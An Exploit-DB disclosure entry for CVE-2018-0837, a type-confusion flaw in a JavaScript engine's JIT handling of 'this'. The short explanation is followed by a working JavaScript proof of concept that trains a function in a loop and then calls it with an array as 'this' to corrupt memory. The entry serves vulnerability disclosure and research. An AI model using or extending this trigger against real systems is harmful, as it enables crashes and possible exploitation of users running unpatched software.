| EDB-ID: 44081 | Author: Google Security Research | Published: 2018-02-15 | CVE: CVE-2018-0837 | Type: Dos | Platform: Windows | Aliases: N/A | Advisory/Source: Link | Tags: Type Confusion | Vulnerable App: N/A | LdThis instructions' value type is assumed to be "Object". Since "this" can be other objects like an array, it has to be assumed to be "LikelyObject", otherwise, operations to "this" will not be checked properly.
PoC:
*/
function opt(arr) {
arr[0] = 1.1;
this[0] = {};
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
opt.call({}, arr);
}
opt.call(arr, arr);
print(arr);
}
main();
